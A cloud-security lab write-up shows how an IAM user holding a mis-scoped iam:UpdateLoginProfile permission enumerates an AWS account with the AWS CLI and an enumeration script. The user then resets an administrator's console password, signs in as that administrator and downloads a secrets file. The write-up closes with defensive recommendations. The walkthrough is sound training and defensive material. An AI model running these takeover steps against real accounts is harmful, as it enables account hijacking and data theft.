AWS: IAM UpdateLoginProfile Abuse

Cloud Security AWS: IAM UpdateLoginProfile Abuse January 16, 2026 By Raj Identity and Access Management (IAM) is the foundation of security in every cloud platform. Misconfigurations or over-privileged identities are among the most common causes of cloud breaches, making IAM a prime target for both attackers and defenders. This hands-on lab demonstrates how a mis-scoped UpdateLoginProfile permission enables console takeover and privilege escalation by resetting a specified IAM user’s console password to gain account access. Table Of Contents About IAM UpdateLoginProfile Lab Setup and Prerequisite Part 1: IAM Lab Setup Provisioning a Low-Privileged IAM User Provisioning a High-Privileged IAM User provisioning a User Group with UpdateLoginProfile policy Part 2: Enumeration and Exploitation Enumerating profile with Python script Set up & Enumeration of profile using AWS CLI IAM UpdateLoginProfile Exploitation Analysis Recommendations Conclusion About IAM: UpdateLoginProfile UpdateLoginProfile in AWS changes the password for the specified IAM user. You can use the AWS CLI, the AWS API, or the Users page in the IAM console to change the password for any IAM user. Lab Setup and Prerequisites: An AWS Account VM Kali Linux If you are new to AWS platform, it is recommended to go through the AWS Lab setup here.  Part 1: IAM Lab Setup Here are the instructions for setting up the environment. We will access the AWS console and configure the AWS Command Line Interface (CLI). Users: igt_sanjeet : Low privileged user with risky permissions attached igt_admin :  High privileged user with admin access Policy name: update-login-policy Provisioning a Low-Privileged IAM User Navigate to IAM > Users, then click Create userto set up a new IAM identity. Create the user a User name(e.g. igt_sanjeet) and press Next to set permission. Set permission to configure igt_sanjeet user’s permissions as Add user to groupfrom the Permissions options, press Next Create user as show Click on the user name i.e. igt_sanjeet   Create access key for the user.  Select “Command Line Interface (CLI)”as the use case.  Check the box as shown and proceed. Click Create access key  Now download the .csv filecontaining the Access Key ID and Secret Access Key. Keep these credentials secure.  Provisioning a High-Privileged IAM User Then, create a powerful IAM user. This user embodies the elevated permissions and  igt_sanjeet (low-privileged user) will reset igt_admin password, sign in as that user, and then pivot to more privileged actions. Navigate to IAM > Users, then click Create userto set up a new IAM identity Give details as igt_admin as user name, click Next On Set permissions, select option Attach policies directly. On Permissions policies, search and select “AdministratorAccess”. This policy grants comprehensive control over virtually all AWS services and resources, making it our “high-privileged” target for the lab. Click Next   Create user igt_admin Now click on the user igt_admin as as shown Select the Enable console access Select the option Autogenerated password and click Enable console access Provisioning a User Group with UpdateLoginProfile policy Go to IAM > User groups > Create group. Add details like the group name as update-login-profile Create the group After creating the group, select its name Click Add permissions → Create inline policy to define and attach a custom policy directly to the group update-login-profile Specify permissions on the Policy Editor in JSON. Write an inline policy which created for a single IAM identity (user, group, or role) and later it will be used as an escalation path. { "Version": "2012-10-17", "Statement": [ { "Effect": "Allow", "Action": [ "iam:UpdateLoginProfile", "iam:ListAccessKeys", "iam:ListAttachedUserPolicies" ], "Resource": "arn:aws:iam::904557616514:user/Igt_admin" }, { "Effect": "Allow", "Action": [ "iam:ListGroupPolicies", "iam:ListPolicies", "iam:ListPolicyVersions", "iam:ListUserPolicies", "iam:ListUsers", "iam:ListGroups", "iam:ListGroupsForUser", "iam:GetPolicy", "iam:GetPolicyVersion", "iam:GetRole", "iam:GetRolePolicy", "iam:GetUser", "iam:GetUserPolicy", "iam:GetGroupPolicy" ], "Resource": "*" }, { "Effect": "Allow", "Action": [ "s3:ListBucket" ], "Resource": "arn:aws:s3:::igt-bucket" }, { "Effect": "Allow", "Action": [ "s3:GetObject" ], "Resource": "arn:aws:s3:::igt-bucket/*" }, { "Effect": "Allow", "Action": [ "s3:ListAllMyBuckets", "s3:GetBucketLocation" ], "Resource": "*" } ] } This is how the policy appears on Policy editor Click next Give policy details such as its name update-login-policy and click create policy The policy is created. Now, select the group name update-login-profile on users groups and click the Add users Select user igt_sanjeet and then he became the part of the group update-login-profile Part 2: Enumeration and Exploitation  Use Case Scenario for UpdateLoginProfile In real world scenarios, it’s for onboarding, but in a security lab it’s to demonstrate how misconfigured permissions can lead to privilege escalation. NOTE: There are two sides of the same thing, an IAM user’s console password (“login profile”). CreateLoginProfile → sets the first console password for a user who doesn’t have one yet. If a login profile already exists, this call fails with “already exists”. UpdateLoginProfile → changes the existing console password. If no login profile exists yet, this call fails with “no such entity.” AWS Documents  Enumerating profile with Python script python enumerate-iam.py --access-key AKI*********** --secret-key ISN************* This Python enumeration confirmed that the low-privileged user igt_sanjeet can list IAM users, groups, buckets and policies, providing the necessary visibility to identify and escalate into higher-privileged accounts.  Set up & Enumeration of profile using AWS CLI Now set up the AWS CLI with the IAM user’s credentials, to directly interact with the AWS environment from Kali machine. Set up a profile named igt_sanjeet in AWS CLI. aws configure --profile igt_sanjeet  Assigning the access key ID, secret access key, and default region for that profile. The following command will retrieve the identity information (UserId, Account ID, ARN) for the currently authenticated user via that profile. aws sts get-caller-identity --profile igt_sanjeet Lists all IAM groups in the account that the Igt_sanjeet profile has permission to see. It does not filter to only groups that igt_sanjeet belongs to, it returns every group in the account (unless blocked by permissions). aws iam list-groups —profile igt_sanjeet This command will list the names of inline policies attached to the IAM group update-loginprofile-group. Pay attention to the output enclosed in red box. aws iam list-group-policies --group-name update-login-profile --profile igt_sanjeet Now,this command will retrieve and display the full JSON document of the inline policy named update-login-policy that is attached to the group update-login-profile. instead of just showing the policy name (like list-group-policies), it reveals the actual permissions (Effect, Action, Resource) that the policy grants. aws iam get-group-policy --group-name update-login-profile --policy-name update-login-policy --profile igt_sanjeet Running this command will list all IAM users in the AWS account that the credentials for the Igt_sanjeet profile have permission to see. aws iam list-users --profile igt_sanjeet With these two commands, try to list bucket and its contents aws s3 ls --profile igt_sanjeet aws s3 ls s3: // igt-bucket --profile Igt_sanjeet Now, try to download the object with the following command and it will be denied. aws s3 cp s3://igt-bucket/secrets.txt --profile igt_sanjeet  Same decline action will be observed when try to remove/delete the object with the following            aws s3 rm s3://igt-bucket/secrets.txt --profile igt_sanjeet  These actions will be denied as the profile igt_sanjeet is not authorized to perform these actions. This command updates a console login profile (username + password) for the IAM user igt_admin. NOTE: Since igt_admin has the AdministratorAccess policy, whoever controls this password can log in to the AWS Console as a full admin, which in a misconfigured environment = privilege escalation to admin. aws iam update-login-profile --user-name igt_admin --password 'YourStrongP@ssw0rd!' –no-password-reset-required --profile igt_sanjeet IAM updateLoginProfile Exploitation Use the AWS Console login page with your account ID, enter IAM username igt_admin, the password you update with update-login-profile, and click Sign in. After login, check the console banner, it should show igt_admin with full access. Now,the user has administrator privileges through privilege escalation. Click your bucket name (igt-bucket) and here in objects you can see a text file secrets.txt, Download the file On AWS CLI, use this command to display the contents of this file and it’s a success this time. cat /home/kali/Downloads/secrets.txt Analysis This hands-on lab walks through a controlled, authorized scenario showing how an attacker with iam:UpdateLoginProfile rights can gain console access to a target account. Important: only run these steps in accounts/environments you are explicitly authorized to test. Misuse against real customers or without permission is illegal.   Recommendations Deny/limit CreateLoginProfile/UpdateLoginProfile except for a small set of admin/service principals. Enforce MFA and permission boundaries on privileged users. Use automation/secret-management to provision console access rather than manual password resets. Monitor CloudTrail and alert on create/update login events and subsequent console logins. Conclusion  This lab demonstrated how a seemingly low-privileged IAM user with the iam:UpdateLoginProfile permission can reset another user’s console password and gain unauthorized console access. The exercise highlights the critical need to restrict CreateLoginProfile and UpdateLoginProfile to administrators only, and continuously monitor CloudTrail for such high-impact IAM actions. Author: Fatima Aziz is an accomplished cybersecurity professional with expertise in cloud security, holding certifications like GPCS and CCSK. Contact Fatima Aziz on LinkedIn.